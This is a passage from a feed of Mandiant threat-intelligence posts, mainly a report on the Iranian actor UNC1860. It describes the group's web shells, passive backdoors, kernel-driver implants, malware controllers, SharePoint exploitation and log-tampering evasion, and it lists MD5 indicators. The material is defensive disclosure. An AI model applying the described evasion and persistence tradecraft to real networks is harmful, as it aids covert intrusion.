#000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div> <div class="block-paragraph_advanced"><h2>URLs</h2></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: 
hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong><span style="vertical-align: baseline;">URL</span></strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">hxxps://daniel-ayala[.]netlify[.]app</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div></div></description><pubDate>Mon, 23 Sep 2024 12:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/threat-intelligence/mitigating-dprk-it-worker-threat/</guid><category>Threat Intelligence</category><og 
xmlns:og="http://ogp.me/ns#"><type>article</type><title>Staying a Step Ahead: Mitigating the DPRK IT Worker Threat</title><description></description><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/threat-intelligence/mitigating-dprk-it-worker-threat/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Mandiant </name><title></title><department></department><company></company></author></item><item><title>UNC1860 and the Temple of Oats: Iran’s Hidden Hand in Middle Eastern Networks</title><link>https://cloud.google.com/blog/topics/threat-intelligence/unc1860-iran-middle-eastern-networks/</link><description><div class="block-paragraph_advanced"><p>Written by: <span style="vertical-align: baseline;">Stav Shulman, Matan Mimran, Sarah Bock, Mark Lechtik</span></p> <hr/></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Executive Summary</span></h2> <p><span style="vertical-align: baseline;">UNC1860 is a persistent and opportunistic Iranian state-sponsored threat actor that is likely affiliated with Iran’s Ministry of Intelligence and Security (MOIS). 
A key feature of UNC1860 is its collection of specialized tooling and passive backdoors that Mandiant believes supports several objectives, including its role as a probable initial access provider and its ability to gain persistent access to high-priority networks, such as those in the government and telecommunications space throughout the Middle East.</span></p> <p><span style="vertical-align: baseline;">UNC1860’s tradecraft and targeting parallel those of </span><a href="https://blog.talosintelligence.com/introducing-shrouded-snooper/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Shrouded Snooper</span></a><span style="vertical-align: baseline;">, </span><a href="https://research.checkpoint.com/2023/from-albania-to-the-middle-east-the-scarred-manticore-is-listening/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Scarred Manticore</span></a><span style="vertical-align: baseline;">, and </span><a href="https://www.microsoft.com/en-us/security/blog/2022/09/08/microsoft-investigates-iranian-attacks-against-the-albanian-government/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Storm</span></a><span style="vertical-align: baseline;">-</span><a href="https://www.microsoft.com/en-us/security/security-insider/intelligence-reports/iran-surges-cyber-enabled-influence-operations-in-support-of-hamas" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">0861</span></a><span style="vertical-align: baseline;">, Iran-based threat actors publicly reported to have targeted the telecommunications and government sectors in the Middle East. 
These groups have also reportedly </span><a href="https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">provided initial access</span></a><span style="vertical-align: baseline;"> for destructive and disruptive operations that targeted Israel in late October 2023 with BABYWIPER and Albania in 2022 using </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/likely-iranian-threat-actor-conducts-politically-motivated-disruptive-activity-against?e=48754805"><span style="text-decoration: underline; vertical-align: baseline;">ROADSWEEP</span></a><span style="vertical-align: baseline;">. Mandiant cannot independently corroborate that UNC1860 was involved in providing initial access for these operations. However, we identified specialized UNC1860 tooling including GUI-operated malware controllers, which are likely designed to facilitate hand-off operations, further supporting the initial access role played by UNC1860.</span></p> <p><span style="vertical-align: baseline;">UNC1860 additionally maintains an arsenal of utilities and a collection of “main-stage” passive backdoors designed to gain strong footholds into victim networks and establish persistent, long-term access. Among these main-stage backdoors is a Windows kernel mode driver repurposed from a legitimate Iranian anti-virus software filter driver, reflecting the group’s ability to reverse engineer Windows kernel components and evade detection. These capabilities demonstrate that UNC1860 is a formidable threat actor that likely supports various objectives ranging from espionage to network attack operations. 
As tensions continue to ebb and flow in the Middle East, we believe this actor’s adeptness in gaining initial access to target environments represents a valuable asset for the Iranian cyber ecosystem that can be exploited to answer evolving objectives as needs shift. </span></p> <h2><span style="vertical-align: baseline;">Teamwork Makes the Dream Work: UNC1860’s Role as an Initial Access Provider </span></h2> <p><span style="vertical-align: baseline;">Mandiant identified two custom, GUI-operated malware controllers tracked as TEMPLEPLAY and VIROGREEN that we assess were used to provide a team outside of UNC1860 remote access to victim networks. This tooling, coupled with </span><a href="https://research.checkpoint.com/2024/bad-karma-no-justice-void-manticore-destructive-activities-in-israel/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">public reporting</span></a><span style="vertical-align: baseline;"> and evidence suggesting that the group collaborates with MOIS-affiliated groups such as APT34, strengthens the assessment that UNC1860 acts as an initial access agent.</span></p> <h3><span style="vertical-align: baseline;">Using Sustained Access to Support Initial Access Operations</span></h3> <p><span style="vertical-align: baseline;">In 2020, Mandiant responded to an engagement in which UNC1860 used the victim’s network as a staging area to conduct additional scanning and exploitation operations against unrelated entities. The actor was observed scanning IP addresses predominantly located in Saudi Arabia in an attempt to identify exposed vulnerabilities. UNC1860 also used a command-line tool to validate credentials of accounts and email addresses across multiple domains belonging to Qatari and Saudi Arabian entities, and later targeted VPN servers of entities in the region. 
</span></p> <h3><span style="vertical-align: baseline;">UNC1860 Overlaps with APT34 </span></h3> <p><span style="vertical-align: baseline;">Mandiant responded to several engagements in 2019 and 2020 in which organizations compromised by suspected APT34 actors were previously compromised by UNC1860. Similarly, organizations previously compromised by suspected APT34 actors were later compromised by UNC1860, suggesting the group may play a role in assisting with lateral movement. Mandiant additionally identified recent indications of operational pivoting to Iraq-based targets by both APT34-related clusters and UNC1860. </span></p> <h3><span style="vertical-align: baseline;">Web Shell and Droppers </span></h3> <p><span style="vertical-align: baseline;">UNC1860 web shells and droppers, such as STAYSHANTE and SASHEYAWAY, deployed and placed on compromised servers by the group after gaining initial access have the potential to be used in hand-off operations based on their functionality. In March 2024, the </span><a href="https://www.gov.il/he/pages/alert_1721" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Israeli National Cyber Directorate was alerted</span></a><span style="vertical-align: baseline;"> to wiper activity targeting Israeli entities across various sectors in Israel, including managed service providers, local governments, and academia; technical indicators included the unique STAYSHANTE web shell and the SASHEYAWAY dropper we attribute to UNC1860.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">STAYSHANTE is typically installed using names masquerading as Windows server file names or dependencies, and is controlled by the VIROGREEN custom framework described as follows.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span 
style="vertical-align: baseline;">SASHEYAWAY has a low detection rate that allows for the smooth execution of full passive backdoors, such as TEMPLEDOOR, FACEFACE, and SPARKLOAD, embedded within it. </span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Custom, GUI-Operated Malware Controllers</span></h3> <p><span style="vertical-align: baseline;">UNC1860 GUI-operated malware controllers TEMPLEPLAY and VIROGREEN could provide third-party actors who have no previous knowledge of the target environment the ability to remotely access infected networks via RDP and to control previously installed malware on victim networks with ease. These controllers additionally could provide third-party operators an interface that walks operators through how to deploy custom payloads and perform other operations such as conducting internal scanning and exploitation within the target network.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig1.max-1000x1000.png" alt="Illustration of collaborator actor&#x27;s C2 used to utilize existing UNC1860 implant infrastructure in compromised network"> </a> <figcaption class="article-image__caption "><p data-block-key="7kc6d">Figure 1: Illustration of collaborator actor's command and control (C2 or C&amp;C) used to utilize existing UNC1860 implant infrastructure in compromised network</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">TEMPLEPLAY Controller</span></h4> <p><span style="vertical-align: baseline;">TEMPLEPLAY (MD5: </span><code style="vertical-align: baseline;">c517519097bff386dc1784d98ad93f9d</code><span style="vertical-align: baseline;">) is a .NET-based controller for the TEMPLEDOOR 
passive backdoor. It is internally named Client Http and consists of several tabs, each one facilitating control of a separate backdoor command.</span></p> <p><span style="vertical-align: baseline;">The Command Prompt Tab (Figure 2) sends a command line to execute on the target host. The default command is </span><code style="vertical-align: baseline;">cmd /c 2 &gt; &amp;1</code><span style="vertical-align: baseline;"> with parameter </span><code style="vertical-align: baseline;">whoami</code><span style="vertical-align: baseline;">.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig2.max-1000x1000.png" alt="TEMPLEPLAY GUI, Command Prompt Tab"> </a> <figcaption class="article-image__caption "><p data-block-key="7kc6d">Figure 2: TEMPLEPLAY GUI, Command Prompt Tab</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The Upload File Tab (Figure 3) sends a file from a local path to a target path on the remote machine using a POST request. 
The default target path is </span><code style="vertical-align: baseline;">C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS</code><span style="vertical-align: baseline;">.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig3.max-1000x1000.png" alt="Upload File Tab"> </a> <figcaption class="article-image__caption "><p data-block-key="ea8sq">Figure 3: Upload File Tab</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The Download File Tab (Figure 4) is used to obtain a file from a given path on the infected machine. The default path on the infected machine is C:\Programdata\1.txt.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig4.max-1000x1000.png" alt="Download File Tab"> </a> <figcaption class="article-image__caption "><p data-block-key="ea8sq">Figure 4: Download File Tab</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The Http Proxy Tab (Figure 5) a</span><span style="vertical-align: baseline;">llows a remote machine infected with TEMPLEDOOR to be used as a middlebox that forwards data to a chosen target server. 
It appears that it is primarily intended to facilitate an RDP connection with the target server, most likely in cases where the latter is not accessible directly over the internet due to network boundaries (such as a NAT or a firewall), but may be accessible via the TEMPLEDOOR infected machine.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig5.max-1000x1000.png" alt="HTTP Proxy Tab"> </a> <figcaption class="article-image__caption "><p data-block-key="4dsz5">Figure 5: HTTP Proxy Tab</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The URLs Tab (Figure 6) includes </span><span style="vertical-align: baseline;">URL endpoints that are used when connecting to the infected machine. An endpoint string is chosen at random from the lists defined in this tab. 
These endpoints correspond to the ones that are defined in the TEMPLEDOOR sample (</span><code style="vertical-align: baseline;">MD5:</code><code style="vertical-align: baseline;">c57e59314aee7422e626520e495effe0</code>).</p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig6.max-1000x1000.png" alt="URLs Tab"> </a> <figcaption class="article-image__caption "><p data-block-key="4dsz5">Figure 6: URLs Tab</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">The TEMPLEPLAY GUI also includes a Test Backdoor link, which c</span><span style="vertical-align: baseline;">reates a GET request with the string </span><code style="vertical-align: baseline;">wOxhuoSBgpGcnLQZxipa</code><span style="vertical-align: baseline;"> as the relative URI and checks for the string </span><code style="vertical-align: baseline;">UsEPTIkCRUwarKZfRnyjcG13DFA</code><span style="vertical-align: baseline;"> in the response. 
This corresponds to an echo / ping mechanism that was seen in use in the TEMPLEDOOR samples (</span><code style="vertical-align: baseline;">MD5:b219672bcd60ce9a81b900217b3b5864</code><span style="vertical-align: baseline;"> and </span><code style="vertical-align: baseline;">MD5:c57e59314aee7422e626520e495effe0</code><span style="vertical-align: baseline;">).</span></p> <p><span style="vertical-align: baseline;">Additional links include the Explore link, which opens a new Explorer window on the host where the controller runs, and the Http Setting link, which points to a set of configuration parameters that pertain to the HTTP requests sent between the controller and the TEMPLEDOOR passive backdoor.</span></p> <h4><span style="vertical-align: baseline;">VIROGREEN Controller</span></h4> <p><span style="vertical-align: baseline;">VIROGREEN is a custom framework used to exploit vulnerable SharePoint servers with CVE-2019-0604 (Figure 7). 
The framework provides post-exploitation capabilities including scanning for and exploiting CVE-2019-0604; controlling post-exploitation payloads, backdoors (including the STAYSHANTE web shell and the BASEWALK backdoor) and tasking; controlling a compatible agent regardless of how the agent has been implanted; and executing commands and uploading/downloading files.</span></p> <p><span style="vertical-align: baseline;">Additional details on TEMPLEPLAY and VIROGREEN can be found in the <a href="https://services.google.com/fh/files/misc/unc1860-technical-annex.pdf" rel="noopener" target="_blank">Technical Annex</a>.</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig7.max-1000x1000.png" alt="VIROGREEN GUI"> </a> <figcaption class="article-image__caption "><p data-block-key="00fds">Figure 7: VIROGREEN GUI</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">UNC1860 Malware: Gaining Persistent Access </span></h2> <p><span style="vertical-align: baseline;">UNC1860 gains initial access to victim environments in an opportunistic manner via the exploitation of vulnerable internet-facing servers leading to web shell deployment. After obtaining an initial foothold, the group typically deploys additional utilities and a selective suite of passive implants that are designed to be stealthier than common backdoors. These provide a higher degree of operational security by removing the dependency for classic C2 infrastructure, making detection more difficult for network defenders. 
</span><a href="https://blog.talosintelligence.com/introducing-shrouded-snooper/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Cisco</span></a><span style="vertical-align: baseline;"> and </span><a href="https://research.checkpoint.com/2023/from-albania-to-the-middle-east-the-scarred-manticore-is-listening/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Check Point</span></a><span style="vertical-align: baseline;"> have provided extensive analysis on UNC1860’s passive implants that correspond to OATBOAT, a loader that loads and executes shellcode payloads; </span><a href="https://www.fortinet.com/blog/threat-research/wintapix-kernal-driver-middle-east-countries" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Fortinet</span></a><span style="vertical-align: baseline;"> additionally provided analysis regarding the Windows kernel driver, WINTAPIX, which has similar code to a malicious driver we track as TOFUDRV (Figure 8 and Figure 9). </span></p> <p><span style="vertical-align: baseline;">A key feature of UNC1860 includes its maintenance of this diverse collection of passive/listener-based utilities that support the group’s initial access and lateral movement goals. We believe the group additionally maintains a smaller collection of “main-stage” backdoors that have greater capabilities than the usual web shells and small .NET utilities that may be deployed for select high-priority victims in the telecommunications sector. These implants demonstrate the group’s keen understanding of the Windows operating system (OS) and network detection solutions, reverse engineering capabilities of Windows kernel components, and detection evasion capabilities. 
</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Passive implants do not initiate outbound traffic from the victim network to a C2 server. Further, the inbound traffic containing commands or payloads can arrive from any volatile source (e.g., VPN nodes within the target country, from another victim, or even internally from another part of the victim network). This makes network monitoring more difficult. Web shells and passive implants leverage HTTPS-encrypted traffic so commands/payloads cannot be extracted from captured network traffic.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Both passive implants TOFUDRV and TOFULOAD leverage undocumented Input/Output Control commands for communication, which requires knowledge of the OS and can lower the chances of this traffic being detected by endpoint detection and response (EDR) solutions.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Loading drivers is a "high risk / high reward" situation as loading them without creating a critical error screen requires extensive knowledge both of the OS internals and victim environments; however, using them promises lower detection rates and possibilities akin to filtering drivers, which act as middlemen allowing for the inspection, modification, or blocking of network traffic before it reaches the device or application, as well as assets like file system objects and registry entries. 
</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">The passive backdoor TEMPLEDROP repurposed an Iranian AV software Windows file system filter driver named Sheed AV (MD5: 0c93cac9854831da5f761ee98bb40c37) for the purpose of protecting some of the files it deploys as well as its own file from modification.</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">A .NET-based utility for defense evasion tracked as TEMPLELOCK was observed being implemented in both foothold utilities such as ROTPIPE and more complex passive implants such as TEMPLEDROP. TEMPLELOCK is capable of terminating threads associated with the Windows Event Log service and restarting the service’s operation on demand.</span></p> </li> </ul></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig8.max-1000x1000.png" alt="Driver file protection logic in WINTAPIX (MD5: 286bd9c2670215d3cb4790aac4552f22)"> </a> <figcaption class="article-image__caption "><p data-block-key="00fds">Figure 8: Driver file protection logic in WINTAPIX (MD5: 286bd9c2670215d3cb4790aac4552f22)</p></figcaption> </figure> </div> </div> </div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/unc1860-temple-of-oats-fig9.max-1000x1000.png" alt="Driver file protection logic in TOFUDRV (MD5: b4b1e285b9f666ae7304a456da01545e)"> </a> <figcaption class="article-image__caption "><p 
data-block-key="00fds">Figure 9: Driver file protection logic in TOFUDRV (MD5: b4b1e285b9f666ae7304a456da01545e)</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">UNC1860 Unique Artifacts Suggest Consistent Development Support</span></h3> <p><span style="vertical-align: baseline;">In addition to the previous observations, we identified the following recurring artifacts related to the group’s independent implementation of Base64 encoding/decoding and XOR encryption/decryption in .NET code, despite these functions being available in built-in .NET code. </span></p> <p><span style="vertical-align: baseline;">The intent of the independent implementation of these functions is not entirely clear. Nevertheless, it is highly likely that using such custom libraries bypasses common detections by EDRs and other security tools, detections designed to identify usage combinations of functions commonly seen in malware. Additionally, using these custom libraries may allow better compatibility if any of the built-in functions change in a specific version of a .NET control, ensuring the group’s tooling is always compatible with its encryption and encoding schemes and/or helping it better evade detection.</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed the same encoding method using the Base64 algorithm to encode and decode data sent between controllers and proxy servers. In several cases, we identified the reuse of a seemingly misspelled Base64 DLL using the name “bsae64” in both foothold utilities deployed via SASHEYAWAY and passive implants including TEMPLEDOOR. 
</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">We observed the same rolling encryption module, XORO (MD5: </span><code style="vertical-align: baseline;">57cd8e220465aa8030755d4009d0117c</code><span style="vertical-align: baseline;">), dropped by the TANKSHELL utility; TUNNELBOI, a network tunneller capable of establishing a connection with a remote host, managing web shells on the network, and creating RDP connections; and the TEMPLEPLAY controller. </span></p> </li> </ul> <h3><span style="vertical-align: baseline;">Foothold Utilities and Backdoors and Malware Use for Longer Term Persistence</span></h3> <p><span style="vertical-align: baseline;">Mandiant is tracking multiple foothold utilities and backdoors used in UNC1860 initial access operations. These generally use custom obfuscation methods that can lower detection rates and make analysis more difficult by renaming strings and function names. Additionally, we are tracking numerous code families that we consider to be UNC1860 “main-stage” implants that further increase the group’s persistence in victim environments. </span></p> <p><span style="vertical-align: baseline;">Please see the <a href="https://services.google.com/fh/files/misc/unc1860-technical-annex.pdf" rel="noopener" target="_blank">Technical Annex</a> for more information. 
</span></p> <h2><span style="vertical-align: baseline;">Additional Protection Information for Google Cloud Customers</span></h2> <p><span style="vertical-align: baseline;">For Google SecOps Enterprise+ customers, SecOps rules have been released to the </span><a href="https://cloud.google.com/chronicle/docs/preview/curated-detections/windows-threats-category"><span style="text-decoration: underline; vertical-align: baseline;">Emerging Threats</span></a><span style="vertical-align: baseline;"> rule pack, and IOCs listed in this blog post are available for prioritization with </span><a href="https://cloud.google.com/chronicle/docs/detection"><span style="text-decoration: underline; vertical-align: baseline;">Applied Threat Intelligence</span></a><span style="vertical-align: baseline;">.</span></p> <h2><span style="vertical-align: baseline;">Indicators of Compromise (IOCs)</span></h2> <p><span style="vertical-align: baseline;">A Google Threat Intelligence Collection featuring <a href="https://www.virustotal.com/gui/collection/bf73231856c4c981eb42fb4bd9cad60fddc444e1ec7375c4d3ad46bf18f4db41" rel="noopener" target="_blank">IOCs related to the activity described in this post</a> is now available for registered users.</span></p> <h3><span style="vertical-align: baseline;">MD5 Hashes</span></h3></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: 
hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">1176381da7dea356f3377a59a6f0e799</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">41f4732ed369f2224a422752860b0bc5</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">4029bc4a06638bb9ac4b8528523b72f6</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">126bc1c30fba27f8bf67dce4892b1e8c</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">0c9ff0db00f04fd4c6a9160bffd85a1d</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">a7693e399602eb79db537c5022dd1e01</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">d9719f6738dbfaa21be7f184512fe074</code></p> </td> <td 
style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">17b27e6aa0ab6501f11bb4d2e0f829ff</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">4dd6250eb2d368f500949952eb013964</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">69fd67c115349abb4a313230a1692642</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">7f5f5f290910d256e6b012f898c88bf3</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">c90ec587e3333dabb647ebc182673460</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">efe8043e1b4214640c5f7b5ddf737653</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">a90236e4962620949b720f647a91f101</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">b26d54b7da7b2bf600104f69da4ea00f</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">d87ca3f830b8b53fde358bb64900f6af</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">c50ae2c4b76f0d5724ec240568c78c4f</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">57cd8e220465aa8030755d4009d0117c</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 
1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">4b2c78bb2c439998cff0cc097a14b942</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">4abcf21b63781a53bbc1aa17bd8d2cbc</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">a3ea0d13848a104c28d035a9d518acc2</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">bd6464f12bb6f7f02b6ffebb363d8e5f</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">f89be788e4adf665acf1a8ef8fcaa133</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">f292e61774c267c3787fdfcace50ea7b</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">c11a4e4a2d484513f79bd127a0387b0c</code></p> </td> <td style="vertical-align: bottom; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">14e54ff4805840e656efb8cd38de4751</code></p> </td> </tr> <tr> <td style="vertical-align: bottom; 